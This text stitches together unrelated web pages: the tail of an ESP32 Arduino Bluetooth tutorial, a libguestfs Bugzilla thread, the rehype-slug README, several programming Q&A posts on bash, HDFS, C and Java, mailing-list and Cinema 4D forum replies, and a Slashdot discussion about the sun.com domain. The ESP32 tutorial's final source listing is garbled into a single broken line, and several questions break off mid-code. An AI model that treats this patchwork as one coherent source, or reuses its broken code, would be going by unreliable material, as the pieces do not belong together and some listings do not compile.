    Serial.println("Failed to enable bluedroid");
    return false;
}
After the initialization, we will set the device name. To do it, we need to call the esp_bt_dev_set_device_name function. This function will receive as input a string with the name of the device. We will use the name which is the argument of our initBluetooth function.
esp_bt_dev_set_device_name(deviceName);
Then we need to make the device discoverable with a call to the esp_bt_gap_set_scan_mode function, passing as input the ESP_BT_SCAN_MODE_CONNECTABLE_DISCOVERABLE enumerated value.
esp_bt_gap_set_scan_mode(ESP_BT_SCAN_MODE_CONNECTABLE_DISCOVERABLE);
With this, we finish our initBluetooth function. Now we still need to declare and implement a function that will be used to retrieve the Bluetooth address of the ESP32.
We will basically reuse the same function of the already mentioned previous post to get the address. In its implementation, we first call the esp_bt_dev_get_address function to get the six bytes that compose the unique address. Then we will print them in the standard format, which corresponds to printing each byte in hexadecimal, separated by colons.
void printDeviceAddress() {

    const uint8_t* point = esp_bt_dev_get_address();

    for (int i = 0; i < 6; i++) {

        char str[3];
        sprintf(str, "%02X", (int)point[i]);
        Serial.print(str);

        if (i < 5) {
            Serial.print(":");
        }
    }
}
Moving on to the Arduino setup function, we will start by opening a wired serial connection, to print the results of our program. Note that the Serial object is being used by both our previously declared functions, so we need to make sure it is initialized before using it.
Serial.begin(115200);
Next we call the initBluetooth function, passing as input the name to assign to the ESP32. I’m using “ESP32 BT”, but you can use other name.
initBluetooth("ESP32 BT");
To finalize the setup function, we call the printDeviceAddress function, which will output the Bluetooth address of the ESP32. We will later be able to compare against the one obtained in the Python script.
printDeviceAddress();
The final Arduino source code for the ESP32 can be seen below.
#include "esp_bt_main.h" #include "esp_bt_device.h" #include "esp_gap_bt_api("ESP32 BT"); printDeviceAddress(); } void loop() {}
Testing the code
The first step for testing the code is to compile it and upload it to the ESP32 using the Arduino IDE. If you run into compilation problems, then you may be using an older version of the Arduino core without support for Bluetooth, which you can easily update by following this guide.
When the procedure finishes, simply open the Arduino IDE serial monitor. You should get an output similar to figure 1, which shows the device address getting printed.
Figure 1 – Bluetooth address of the ESP32.
After this, simply run the Python script we have developed on the environment of your choice. I’m running it on IDLE, the Python IDE that comes with the language installation.
You should get an output similar to figure 2, which shows the ESP32 getting detected during the scan. Note that the address matches the one we obtained on the Arduino IDE serial monitor and the device name is the same we specified in the Arduino code.
Figure 2 – Finding the device with Pybluez.
Related posts
- ESP32 Arduino Serial over Bluetooth: Receiving data
https://techtutorialsx.com/2018/03/26/esp32-arduino-bluetooth-finding-the-device-with-python/
Red Hat Bugzilla – Bug 664558
RFE: Allow to set log callback in Ruby bindings
Last modified: 2011-03-28 05:06:37 EDT
Currently there is no way to set a log callback using Ruby bindings. It would be very helpful for Ruby tools that want to integrate with libguestfs to catch the log output.
I think this would be useful.
As discussed on IRC, won't get done until mid Jan (by me)
but if you want to have a go at a patch then be my guest.
More thoughts on this issue:
Currently g->log_message_cb will only see messages sent by
the daemon to the VM console. If g->verbose is set, then
these messages are *also* printed to stderr (as well as being
sent to the g->log_message_cb handler if any).
Some types of message that g->log_message_cb would never see:
* extra debug from the library when g->verbose is set
* trace messages (LIBGUESTFS_TRACE=1: these go to stderr)
* debug from other things that use the guestfs_get_verbose
call, eg. capitests, guestfish
So g->log_message_cb is not very useful. At the same time
there is obviously a need to be able to capture debug and
trace messages separately in GUI programs
(guestfs-browser, BoxGrinder and RHEV-M all need it).
We cannot change g->log_message_cb, because of the ABI contract.
I will think about some alternate way and post about it on the
mailing list.
(In reply to comment #2)
> I will think about some alternate way and post about it on the
> mailing list.
Interim patch posted for review here:
Full patch series including Ruby bindings posted:
One aspect that is broken is that the Ruby interpreter segfaults
if the callback raises any sort of exception. Apparently one
can prevent this using the 'rb_rescue' function, but I have yet
to find a coherent explanation of how exactly to use this.
Hey Rich,
While the rb_* calls can be a bit dense, in the end they are relatively easy to use. rb_rescue in particular takes exactly 4 arguments: the function that you want to call, the (single) argument to that function, the function to call if the original function throws an exception, and the (single) argument to the rescue function. If you compile and run the below example, the first call to rb_rescue() calls cb, which succeeds without doing much, so only "Hello from cb" is printed. The second call to rb_rescue() calls cb, which then raises an exception, at which point rescue() is called to do cleanup work. You can compile the program with: gcc -g -Wall test.c -I/usr/lib64/ruby/1.8/x86_64-linux -lruby
#include <stdio.h>
#include <stdlib.h>
#include <ruby.h>
static VALUE cb(VALUE args)
{
fprintf(stderr, "Hello from cb\n");
if (TYPE(args) != T_FIXNUM)
rb_raise(rb_eTypeError, "expected a number");
return Qnil;
}
static VALUE rescue(VALUE args, VALUE exception_object)
{
fprintf(stderr, "Rescue args %s, object classname %s\n",
StringValueCStr(args),
rb_obj_classname(exception_object));
return Qnil;
}
int main()
{
int r;
ruby_init();
r = rb_rescue(cb, INT2NUM(0), rescue, rb_str_new2("data"));
r = rb_rescue(cb, rb_str_new2("bad"), rescue, rb_str_new2("data"));
return 0;
}
Upstream (with broken exception handling): commit 6a64114929a0b098f5a1e31e17e7802127925007
Thanks Chris; Ruby exceptions are fixed now too: commit e751293e10d5ecbb2ef43a61b9c153a1fc4f0304
https://bugzilla.redhat.com/show_bug.cgi?id=664558
rehype-slug
rehype plugin to add ids to headings.
Contents
- What is this?
- When should I use this?
- Install
- Use
- API
- Types
- Compatibility
- Security
- Related
- Contribute
- License
What is this?
This package is a unified (rehype) plugin to add ids to headings. It looks for headings (so <h1> through <h6>) that do not yet have ids and adds id attributes to them based on the text they contain. The algorithm that does this is github-slugger, which matches how GitHub works.

unified is a project that transforms content with abstract syntax trees (ASTs). rehype adds support for HTML to unified. hast is the HTML AST that rehype uses. This is a rehype plugin that adds ids to headings in the AST.
When should I use this?
This plugin is useful when you have relatively long documents and you want to be able to link to particular sections.
A different plugin, rehype-autolink-headings, adds links to these headings back to themselves, which is useful as it lets users more easily link to particular sections.
Install
This package is ESM only. In Node.js (version 12.20+, 14.14+, or 16.0+), install with npm:

npm install rehype-slug

In Deno with Skypack:

import rehypeSlug from 'https://cdn.skypack.dev/rehype-slug'

In browsers with Skypack:

<script type="module">
  import rehypeSlug from 'https://cdn.skypack.dev/rehype-slug'
</script>
Use
Say we have the following file example.html:
<h1 id=some-id>Lorem ipsum</h1>
<h2>Dolor sit amet 😪</h2>
<h3>consectetur & adipisicing</h3>
<h4>elit</h4>
<h5>elit</h5>
And our module example.js looks as follows:
import {read} from 'to-vfile'
import {rehype} from 'rehype'
import rehypeSlug from 'rehype-slug'

main()

async function main() {
  const file = await rehype()
    .data('settings', {fragment: true})
    .use(rehypeSlug)
    .process(await read('example.html'))

  console.log(String(file))
}
Now, running node example.js yields:
<h1 id="some-id">Lorem ipsum</h1> <h2 id="dolor-sit-amet-">Dolor sit amet 😪</h2> <h3 id="consectetur--adipisicing">consectetur & adipisicing</h3> <h4 id="elit">elit</h4> <h5 id="elit-1">elit</h5>
API
This package exports no identifiers. The default export is rehypeSlug.
unified().use(rehypeSlug)
Add ids to headings. There are no options.

Compatibility

This plugin works with rehype-parse version 1+, rehype-stringify version 1+, rehype version 1+, and unified version 4+.
Security
Use of rehype-slug can open you up to a cross-site scripting (XSS) attack, as it sets id attributes on headings, which causes what is known as "DOM clobbering". Please use rehype-sanitize and see its Example: headings (DOM clobbering) for information on how to properly solve it.
Related
rehype-autolink-headings — add links to headings with IDs back to themselves
Contribute
See contributing.md in rehypejs/.github for ways to get started. See support.md for ways to get help.
This project has a code of conduct. By interacting with this repository, organization, or community you agree to abide by its terms.
https://unifiedjs.com/explore/package/rehype-slug/
looping through two loops in bash script
I am trying to get partition from the first for loop and use it in the second loop to get the directory, but I get an error on line 3 near ${partition}:
for partition in `hdfs dfs -ls -C /user/constantine/analytics/2018-01-3* | cut -d '/' -f 6 | uniq`
do
    for filename `hdfs dfs -ls -C /user/constantine/analytics/{$partition}`
    echo $filename
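For what it's worth, a corrected sketch of what the loops appear to intend (the inner loop needs the in keyword and its own do/done, and the expansion should be ${partition}, not {$partition}):

for partition in $(hdfs dfs -ls -C /user/constantine/analytics/2018-01-3* | cut -d '/' -f 6 | uniq)
do
    for filename in $(hdfs dfs -ls -C /user/constantine/analytics/${partition})
    do
        echo "$filename"
    done
done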
- Removing endline character
So I'm trying to read from a fifo-file (basically a named pipe), but when I do a string comparison using strcmp() it is not giving the expected output. I tried getting the length of the message using strlen() and explicitly setting the last character to '\0', but it is still not working.
ret_val = read(fd, buff, BUFFSIZE); // buff is the character array reading from the fd of the fifo-file,
                                    // and BUFFSIZE has been defined as 32
ret_val = 1;
str_len = strlen(buff);
buff[str_len] = '\0';
ret_val = strcmp(buff, "bye");

if (!ret_val) {
    printf("\nProgram is terminating . . .");
}
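A sketch of the usual fix: read() does not null-terminate, so terminate using the returned byte count (buff[strlen(buff)] = '\0' only re-writes whatever terminator happens to be there), and strip the trailing newline if the writer sends one:

ret_val = read(fd, buff, BUFFSIZE - 1);
if (ret_val > 0) {
    buff[ret_val] = '\0';                 /* terminate at the actual byte count */
    if (buff[ret_val - 1] == '\n')
        buff[ret_val - 1] = '\0';         /* drop a trailing newline, if any */
    if (strcmp(buff, "bye") == 0)
        printf("\nProgram is terminating . . .");
}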
- Find replace for many strings, still sed?
I am currently facing the following issue. I have accidentally made a naming error for 581 headers of my sequence data. I have created a txt file with in column 1 the wrong names and in column 2 the correct names, so I simply want to "find-replace" using this txt file as input. The location of the wrong header names in the file which I want to edit is not fixed.
Example of the first 3 lines of the "find and replace file":
TRINITY_DN143863_c0_g1_i1:1-201 TRINITY_DN143863_c0_g1_i1
TRINITY_DN224157_c0_g1_i1:1-202 TRINITY_DN224157_c0_g1_i1
TRINITY_DN198969_c0_g1_i1:1-202 TRINITY_DN198969_c0_g1_i1
Ideally I want to search in a file for the name in column one and replace it by the name in the second column. The files where I want to have the names replaced have different structures. Usually if I need to replace a single string I would use sed, would that be possible here also? I have not been able to find a way to get sed to work with an input file. Maybe someone has the solution?
Thanks very much in advance!
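One hedged sketch of such a find-and-replace, assuming the mapping file is named names.txt (whitespace-separated columns, as above) and the file to fix is headers.txt; the map is loaded on the first pass over names.txt and every key occurrence is substituted on the second pass:

awk 'NR==FNR { map[$1] = $2; next } { for (k in map) gsub(k, map[k]) } 1' names.txt headers.txt > fixed.txt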
- File transfer works ls option does not work for files in pscp
In windows batch file, I am trying pscp with -ls option to list a specific file on the unix server, which is available. But I am getting the error as follows:
d:\temptest>pscp -ls readuser@hostServer:/reports/job_report.dat
Listing directory /finreports/EOD/FCBZIM_20190301.zip
Unable to open /finreports/EOD/FCBZIM_20190301.zip: no such file or directory
While I understand that it says "Listing directory", the error message says "no such FILE or directory". Is there a way to list specific files?
However, I am able to list the directory as such.
d:\temptest>pscp -ls readuser@hostServer:/reports/
Listing directory /reports
drwxrwxrwx   3 admin    staff        256 Feb 14 17:17 .
drwxrwxrwx   3 root     system       256 Feb 11 17:06 ..
drwxrwxrwx  34 admin    staff       4096 Feb 14 17:54 JOBS
-rw-rw-r--   1 admin    staff    8836162 Feb 14 03:47 job_report.dat
And yes, the file transfer is also successful without any issues.
d:\temptest>pscp readuser@hostServer:/reports/job_report.dat d:\
job_report.dat            | 8629 kB | 1078.6 kB/s | ETA: 00:00:00 | 100%
Please help me out in listing specific files.
- Can't kill YARN apps using ResourceManager UI after HDP 3.1.0.0-78 upgrade
I recently upgraded HDP from 2.6.5 to 3.1.0, which runs YARN 3.1.0, and I can no longer kill applications from the YARN ResourceManager UI, using either the old (:8088/cluster/apps) or new (:8088/ui2/index.html#/yarn-apps/apps) version. I can still kill them using the shell in RHEL 7 with yarn app -kill {app-id}
These applications are submitted via Livy. Here is my workflow:
Open the ResourceManagerUI, open the Application, click Settings and choose Kill Application. Notice, the 'Logged in as:' is set to UNKNOWN_USER:
Confirm that I want to kill the Application:
I get the following error in the UI:
Opening the console in Chrome, I see a 401 (Unauthorized) error.
If I try this from the old UI I am able to expand the error message and it shows the following:
{"RemoteException":{"exception":"AuthorizationException","message":"Unable to obtain user name, user not authenticated","javaClassName":"org.apache.hadoop.security.authorize.AuthorizationException"}}
I've read lots of posts, verified and changed several settings to try to fix this with no luck. Here are some of the settings I checked or changed as a result of my research:
hadoop.http.filter.initializers=org.apache.hadoop.security.HttpCrossOriginFilterInitializer,org.apache.hadoop.http.lib.StaticUserWebFilter
hbase.security.authentication=simple
hbase.security.authorization=false
yarn.nodemanager.webapp.cross-origin.enabled=true
yarn.resourcemanager.webapp.cross-origin.enabled=true
yarn.resourcemanager.webapp.delegation-token-auth-filter.enabled=false
yarn.resourcemanager.webapp.ui-actions.enabled=true
yarn.timeline-service.http-authentication.simple.anonymous.allowed=true
yarn.timeline-service.http-authentication.type=simple
yarn.webapp.api-service.enable=true
yarn.webapp.ui2.enable=true
ranger.add-yarn-authorization=false
Some of these seem way off base to me, like the hbase stuff, since I don't think that has anything to do with what I'm seeing. However, some users, in other situations, had it work for them so I wanted to try it.
Digging through the documentation it seems like you need to be authenticated before you can call the API. However, that same language was in the documentation for 2.6.5, which is the version of YARN I was running before where this worked.
Hopefully someone can point me to documentation that more clearly outlines what I can do to resolve the issue.
Thanks in advance.
- Get the two first files from HDFS
Is there a way to get the first two files from HDFS using the command line? My Hadoop version is 2.7.3.
I have a folder in HDFS with multiple files that another application is putting there:

/user/Lab01/inpu/ingestionFile1.json
/user/Lab01/inpu/ingestionFile2.json
/user/Lab01/inpu/ingestionFile3.json
/user/Lab01/inpu/ingestionFile4.json
I need to work with just the first two files based on time. So if I list the contents using:
$ hdfs dfs -ls -R /user/Lab01/input
-rw-------   3 huser dev        668 2019-02-13 11:34 /user/Lab01/inpu/ingestionFile1.json
-rw-------   3 huser dev        668 2019-02-13 11:36 /user/Lab01/inpu/ingestionFile2.json
-rw-------   3 huser dev        668 2019-02-13 11:38 /user/Lab01/inpu/ingestionFile3.json
-rw-------   3 huser dev        668 2019-02-13 11:41 /user/Lab01/inpu/ingestionFile4.json
To get the first two files from the directory, I simply pipe the listing through head -2:

$ hdfs dfs -ls -R /user/Lab01/input | head -2
The normal command to get files from hdfs is using -get:
hdfs dfs -get /user/Lab01/input/fileName
So that's why right now I'm trying to merge these two commands:
$ hdfs dfs -get /user/Lab01/input | hdfs dfs -ls -R /user/Lab01/input | head -2
But I don't get the desired result; I just get the output from the last command.
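One hedged way to put the pieces together: list the files, sort by the date and time columns, keep the first two, and feed each path to -get (this assumes the paths contain no spaces):

hdfs dfs -ls /user/Lab01/input | grep '^-' | sort -k6,7 | head -2 | awk '{print $NF}' | \
while read f; do
    hdfs dfs -get "$f"
done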
- Unable to connect to hive using python using impyla/dbapi.py
I am trying to connect to Hive (with the default Derby DB) using Python:
from impala.dbapi import connect

conn = connect(host='localhost', port=10000)
cursor = conn.cursor()
cursor.execute('SELECT * FROM employee')
print cursor.description  # prints the result set's schema
results = cursor.fetchall()
but I am getting this error:
Traceback (most recent call last):
  File "hivetest_b.py", line 2, in <module>
    conn = connect( host='localhost', port=10000)
  File "/home/ubuntu/.local/lib/python2.7/site-packages/impala/dbapi.py", line 147, in connect
    auth_mechanism=auth_mechanism)
  File "/home/ubuntu/.local/lib/python2.7/site-packages/impala/hiveserver2.py", line 758, in connect
    transport.open()
  File "/home/ubuntu/.local/lib/python2.7/site-packages/thrift/transport/TTransport.py", line 149, in open
    return self.__trans.open()
  File "/home/ubuntu/.local/lib/python2.7/site-packages/thrift/transport/TSocket.py", line 101, in open
    message=message)
thrift.transport.TTransport.TTransportException: Could not connect to localhost:10000
I have the entry in my /etc/hosts, and I am using the default hive-site.xml and the default Derby database to run Hive. When I run Hive through the shell, it shows me that table:
hive> show databases;
OK
default
test
test_db
Time taken: 0.937 seconds, Fetched: 3 row(s)

hive> show tables;
OK
employee
Time taken: 0.054 seconds, Fetched: 1 row(s)

hive> describe employee;
OK
empname       string
age           int
gender        string
income        float
department    string
dept          string

# Partition Information
# col_name    data_type    comment
dept          string
Time taken: 0.451 seconds, Fetched: 11 row(s)
I am not sure what exactly am I missing here. Any quick references/pointers would be appreciated.
Regards, Bhupesh
- Convert zip file to gzip and write to hdfs
I have a zip file which I want to convert to gzip and write it back to the filesystem. How can I do this?
I already have this code to compress a file to gzip:
private static void compressGzipFile(String file, String gzipFile) {
    try {
        FileInputStream fis = new FileInputStream(file);
        FileOutputStream fos = new FileOutputStream(gzipFile);
        GZIPOutputStream gzipOS = new GZIPOutputStream(fos);
        byte[] buffer = new byte[1024];
        int len;
        while ((len = fis.read(buffer)) != -1) {
            gzipOS.write(buffer, 0, len);
        }
        // Close resources
        gzipOS.close();
        fos.close();
        fis.close();
    } catch (IOException e) {
        e.printStackTrace();
    }
}
Now I need code to convert the zip file into a gzip file.
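A hedged sketch of one approach: a zip is an archive of entries while gzip compresses a single stream, so this assumes the zip holds a single entry and re-compresses just that entry's bytes:

private static void zipToGzip(String zipFile, String gzipFile) {
    try (ZipInputStream zis = new ZipInputStream(new FileInputStream(zipFile));
         GZIPOutputStream gzipOS = new GZIPOutputStream(new FileOutputStream(gzipFile))) {
        ZipEntry entry = zis.getNextEntry();  // first (assumed only) entry
        if (entry == null) {
            return;
        }
        byte[] buffer = new byte[1024];
        int len;
        while ((len = zis.read(buffer)) != -1) {
            gzipOS.write(buffer, 0, len);
        }
    } catch (IOException e) {
        e.printStackTrace();
    }
}

Writing the result to HDFS instead of the local filesystem would then mean swapping the FileOutputStream for a stream from org.apache.hadoop.fs.FileSystem's create() method.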
- load data from HDFS to Druid in real time
A producer generates a file to HDFS every minute; each file is nearly 0.5 GB, and it should be loaded into Druid within 1 minute.
Hadoop-based batch ingestion in Druid is supported via a Hadoop-ingestion task, but a MapReduce task costs a lot of time. How can I load data from HDFS to Druid more efficiently?
thx.
- How to make "find" command to recursively list files in symbolic link directories?
I've got a directory named a, which has 3 sub-directories, 2 of them are links
ls -lrt a
dir_1
dir_2 -> xxx
dir_3 -> xxx
Then when I use either "ls -R" or find ./ -name "*" on directory a, only the files and directories inside "dir_1" are recursively listed; "dir_2" and "dir_3" only show the top-level name of the symbolic link. I wish all files in dir_2 and dir_3 to be recursively listed as well. How can I do this?
Thanks.
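For reference, find follows symbolic links when given the -L option, and ls does the equivalent when -L is combined with -R:

find -L ./ -name "*"
ls -LR a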
- How to list all text files in root and subdirectories using 'ls'
I use this to list all text files in the d:\ root:

ls d:\*.txt

And this to list all text files in all sub-directories:

ls d:\*\*.txt

How can I list all text files in the root AND in all sub-directories using ls?
This doesn't work:

ls d:/{,**/}*.txt

edit: in ls, not in find, grep, awk, sed or whatever other search command
- using "ls" and preserving the spaces in the resulting array
I am trying to read a directory with "ls" and do operations on it.
Directory example:

$ ls -1
x x
y y
z z

Script file: myScript.sh

#!/bin/bash
files=(`ls -1`);
for (( i=0; i<"${#files[@]}"; i+=1 )); do
    echo "${files[$i]}"
done

However, the output is:

$ myScript.sh
x
x
y
y
z
z

Yet if I define "files" in the following way:

$ files=("x x" "y y" "z z")
$ for ((i=0; i<"${#files[@]}"; i+=1 )); do echo "${files[$i]}"; done
x x
y y
z z

How can I preserve the spaces in "files=(`ls -1`)"?
On 3/31/2018 2:14 PM, Marius Räsener wrote:
Oh, ok... yeah didn't think of that. Except I guess I'd assume that so far multiline strings are either with textwrap or 'don't care'? Maybe?
For docstrings, I don't care, as a docstring consumer like help() can reformat the docstring with indents and dedents. For instance
def f():
    def g():
        """returnx

        more doc
        """
    print(g.__doc__)
    help(g)

f()

returnx

        more doc

Help on function g in module __main__:

g()
    returnx

    more doc
For other situations, parse-time string concatenation often suffices, as I showed in my response to the original post. This example from idlelib.config shows the increased flexibility it allows. It has 1-line padding above and 1-space padding to the left to look better when displayed in a popup box.
warning = ('\n Warning: config.py - IdleConf.GetOption -\n'
           ' problem retrieving configuration option %r\n'
           ' from section %r.\n'
           ' returning default value: %r' %
           (option, section, default))
With no padding, I would not argue with someone who prefers textwrap.dedent, but dedent cannot add the leading space.
For literals with really long lines, where the physical indent would push line lengths over 80, I remove physical indents.
class TestClass(unittest.TestCase):
    def test_outputter(self):
        expected = '''\
First line of a really, really, ............................, long line.
Short line.
Summary line that utilizes most of the room alloted, with no waste.
'''
        self.assertEqual(outputter('test'), expected)
-- Terry Jan Reedy
Button is pressed on startup of tag plugin[SOLVED]
On 08/10/2014 at 09:21, xxxxxxxx wrote:
Hi, I created a little plugin with a few parameters and a button.
I want to do stuff in reaction to button clicks, but when I start the plugin, the button gets executed once already. How can I avoid this?
This is my code for the button:
def Execute(self, tag, doc, op, bt, priority, flags):
    data = tag.GetDataInstance()
    if MYBUTTON:
        print "The button is pressed"
    return True
On 08/10/2014 at 10:57, xxxxxxxx wrote:
add this function:
def GetMessageID(data):  # This custom method is used to get the id of your gizmos
    if data is None:
        return
    try:
        return data["id"][0].id
    except:
        return
and add this to the Message:
def Message(self, op, type, data):
    id = GetMessageID(data)  # calls the custom GetMessageID() method
    if id == MYBUTTON:
        print "The button is pressed"
Thanks to Scott on this forum for teaching it to me.
On 09/10/2014 at 02:39, xxxxxxxx wrote:
Thanks for the answer!!
I didn't need to add the GetMessageID though. Fixed it with:
def Message(self, node, type, data):
    if type == c4d.MSG_DESCRIPTION_COMMAND:
        if data['id'][0].id == MOMBUTTON:
            print "The button is pressed"
    return True
On 09/10/2014 at 02:47, xxxxxxxx wrote:
casimir your solution is much cleaner. That's exactly how you should do it
On 09/10/2014 at 13:08, xxxxxxxx wrote:
Thanks NiklasR!! Your words give me a boost to continue delving into it, harder than ever :D
A good first step would be understanding how the other entry works:

    cartProd :: [a] -> [b] -> [(a,b)]
    cartProd xs ys = do
        x <- xs
        y <- ys
        return (x,y)

It is about halfway between the two choices.

John

On Thu, Feb 9, 2012 at 9:37 AM, readams <richard.adams at lvvwd.com> wrote:
> Nice explanation. However, at
> it was pointed out that this
>
>     cartProd :: [a] -> [b] -> [(a, b)]
>     cartProd = liftM2 (,)
>
> is equivalent to the cartesian product produced using a list comprehension:
>
>     cartProd xs ys = [(x,y) | x <- xs, y <- ys]
>
> I do not see how your method of explanation can be used to explain
> this equivalence? Nevertheless, can you help me to understand how
> liftM2 (,) achieves the cartesian product? For example,
>
>     Prelude Control.Monad.Reader> liftM2 (,) [1,2] [3,4,5]
>     [(1,3),(1,4),(1,5),(2,3),(2,4),(2,5)]
>
> Thank you!
Oracle Could Reap $1 Million For Sun.com Domain 183
joabj writes "Last week, Oracle announced that it is decommissioning the Sun.com site, which it acquired as part of the $7 billion purchase of Sun Microsystems. So what will Oracle do with the domain name, which is the 12th oldest .com site on the Internet? Domain brokers speculate Oracle could sell it for $1 million or more, if it chose to do so."
Sell it to the King of France (Score:1)
The Sun King will pay big bucks
Re: (Score:2)
And France hasn't had a king at all for more than 150 years...
Are you saying the Burger King isn't a real king?
Royal with Cheese baby!
Re: (Score:2)
I'm wondering, are all the people ruining the jokes in this thread French?
Oui
Re: (Score:2)
Probably not ; they're probably people from a culture that is generally proud of not needing to travel to meet foreign influences in different parts of the world (at least, not until they've been sanitised down to their own domestic standards).
Possibly they're even people who have, in living memory, had a head of state who has never felt the need to get a passport to travel the world on his own behalf.
Some such people seem to have be
One million? Really? (Score:2)
Dr. Evil: Here's the plan. We get the warhead, and we hold the world ransomed for.....One MILLION DOLLARS!!
No.2: Ahem...well, don't you think we should maybe ask for *more* than a million dollars? I mean, a million dollars isn't exactly a lot of money these days. Virtucon alone makes over nine billion dollars a year!
Dr. Evil: Really?
No.2: Mm-hmm.
Dr. Evil: That's a number. Okay then. We hold the world ransom for.....One hundred..BILLION DOLLARS!!
Many domains are worth more. (Score:3)
I just don't see them selling it off right now. It isn't like Larry is broke and needs the bucks. And it isn't like the market for domain names is at a high point. He would get more selling the Sun name, domain, and some minor IP to someone as a set. He has already carved all the white meat off that turkey, which is the customer base and some software.
Re: (Score:3)
They wanna make sure it (the domain) doesn't come back. They wanna make sure those pesky hippies with their open-source sandals and well-engineered hemp shirts go somewhere else, somewhere that is NOT ORACLE. Because to have the PRIVILEGE of being served by an Oracle web server, you should be wearing an Armani suit, a silk tie and matching pointy italian shoes.
Re: (Score:2)
Hah! Dead on there.
As one of those pesky hippies who works for a company that owns about 1500 Sun servers, allow me to say that Larry can go fuck himself. When they increased our support contract to $8M/year, we told them to take a hike. We are replacing all of our Sun software, most of our Solaris instances, and much of our Sun hardware in less than two years.
I mourn Sun, but they're dead now. Nobody is going to pay more than pocket change for the sun.com domain. Filthy dirty fucking Oracle.
Re: (Score:2)
The Chicago Sun. The U.K. paper "The Sun", etc. There are plenty of companies who would want it and would pay more than pocket change, although the economy won't support a premium price right now.
Maybe Oracle can make it one of those cheesy ad farms, complete with Google ads on both sides, top and bottom, complete with BizRate ads "Looking for a great price on sun?"
Re: (Score:3)
So would this be worth more to Oracle in terms of marketing than the sale price of the domain.
Re: (Score:2)
"Nah!"
- Theodoric of York
Re: (Score:2)
Donate, or sell it, either way this would be the best possible place for it.
Re: (Score:2)
It isn't about ease of use, it is about clout. Why would the Coca-Cola company care about coke.com? Clout. The big with the shortest domain name has the biggest penis, after all.
Re:Many domains are worth more. (Score:5, Funny)
I find your ideas interesting and would like to subscribe to your newsletter.
Re: (Score:2)
I find your ideas interesting and would like to subscribe to your newsletter.
I personally find it a bit like gas mask porn. I'm glad it's out there; I believe in the freedom of speech; I really hope the users are happy and fully satisfied. However, I have no personal need to ever see this particular newsletter.
Just saying. (BTW; I once heard that the gas mask fetish was really popular in the UK in the 50s & 60s following on from the long nights of the london blitz; can't find a citation though).
Solaris replacement (Score:3)
Would you mind telling us what you're replacing it with? RHEL, Ubuntu Server, *BSD, other?
And how have you replicated those nice Solaris features (containers, that debugging thing, the new copy-on-write filesystem), or if they are missed at all?
Re: (Score:3)
Migration in general is going to RHEL. It's been my experience that containers just never caught on in the enterprise world. (I run 'em at home, we've got a few in our lab, but they were stillborn for us and most other companies I talk to.) Dtrace is very handy once in a long while, but only when things go wrong--which they shouldn't.
And that leaves zfs. Rumour has it that RedHat is going to be releasing an incompatibly-licensed ZFS to their customers. I hope it's true, because it is the single greatest ste
Re: (Score:2)
Rupert Murdoch might want to buy it to go with [nsfw], the top selling "newspaper" in the English speaking world.
Re: (Score:2)
i mourn Sun, but they're dead now. Nobody is going to pay more than pocket change for the sun.com domain. Filthy dirty fucking Oracle.
A lot of us feel that way about Oracle and what happened. However i do think the domain name is worth far more than pocket change, regardless of its history.
Re: (Score:2)
So are they going to get rid of "com.sun.java"?
I remember not long ago Oracle changed certain things from Sun to Oracle and broke stuff: [slashdot.org] [computerworlduk.com]
Seems Oracle thinks changing names is more important than getting technical stuff working right.
FWIW I recently had problems after updating "Oracle Virtualbox", so much so I had to go back to an older version.
Re: (Score:2)
It doesn't have to be used for computers. If they don't want a competitor to get it, they can sell it to something completely different. It would be a great domain for astronomers or ham radio operators to store their sun spot data, or maybe sun worshipers can use it as a holy site. Is Sun Ra still around?
Re: (Score:2)
Caldera might be interested. They shat all over SCO, why not do the same to Sun?
Re: (Score:3)
The domain on its own is worth hardly anything without the IP. Any party that is serious about the domain will want no problems with trade marks or IP claims against the use of the domain. Now I hardly think that is going for only a million dollars.
Of course, a business that had nothing to do with computers, software, databases, etc. might not have to worry about trade mark claims as their business might not constitute dilution of the mark (as in the case of Mr. Nissan with Nissan Computers), but I seriou
Re: (Score:3)
The internet is full of links to sun.com from all sorts of web pages that will never be removed. Anyone who owns the domain gets literally millions of link referrals for free.
Re: (Score:2)
The internet is full of links to sun.com from all sorts of web pages that will never be removed. Anyone who owns the domain gets literally millions of link referrals for free.
Invalidation of those links would hurt people who have purchased Sun's products....
In many cases, those would be links to documentation, downloads, help references, etc.
Re: (Score:2)
While I can't think of an application for the domain (except the newspapers I mentioned earlier), it wouldn't be unheard of for another company to change their name to Sun, if they can get the domain and trademarks. Perhaps Lenovo or some other computer company that is large but not recognizable enough, or wants the "street cred" to take it to the next level. Asus, Gigabyte, Biostar, etc.
Maybe AMD will buy it to start a computer company of their own, to be more direct (thus more competitive) in the server ma
NBA (Score:3)
Re: (Score:1)
Not the way they've been playing of late. They should go back to "run and gun" instead of trying to be a half-court team for the post-season. Fuck the post-season. It was more fun when they scorched everyone in the regular season. That's Nash's real skill.
Sink Question (Score:2)
Suns.com, not Sun.com (Score:2)
Suns already have suns.com. Sun.com doesn't make any sense. Look at laker.com, celtic.com, etc. NBA teams don't own those.
wasn't this the cause of the .com bubble (Score:1)
Re: (Score:2)
Even if no one cares about Sun Microsystems, or has a paper named The Sun, or some other existing product or service with "sun" in it, it's still a three-letter .com domain. That is worth mucho dinero. And then massive extra credit points for being a common English word.
If there isn't a site already for the domain, someone will create or rename their site "Sun (\S+)" just for the domain. No one is going to forget a web site called.
If I thought that Slashdot had the money to do it, I imagine th
I must have this site...but first... (Score:4, Funny)
What's the IP Address of the Sun?
Re: (Score:3)
use broadcast, 255.255.255.255
even with that mask, you're still visible under the sun.
Re: (Score:2)
0.0.0.1
Hmmm (Score:2)
Re: (Score:2)
Larry should....
Larry: Release the hounds!
Re: (Score:2)
And yet pizza.com sold a couple of years ago for $2.6million. I know the economy was in better shape then, but it was still a 'legitimate' sale, not some crazy bubble start up in 1998.
I don't understand it either, if I'm honest, but we all know that what something is worth is whatever someone will pay for it, and apparently generic domains really are worth a bit.
Feeling a tad smug (Score:2)
I remember working in the IT department of a fair-sized company back in '99 and it was a dedicated Sun shop, in fact my boss denigrated Linux and open-source software (of course he called it freeware) any chance he could. He talked like Sun would be around forever...oops.
Oldest dotcoms (Score:2)
Interesting that Microsoft, established in 1975, doesn't appear on the list of the 100 oldest dotcom registrations. Xerox registered before IBM. Boeing before Adobe. And Microsoft isn't on the list. Did they not recognise the long-term importance of the internet?
Re: (Score:1)
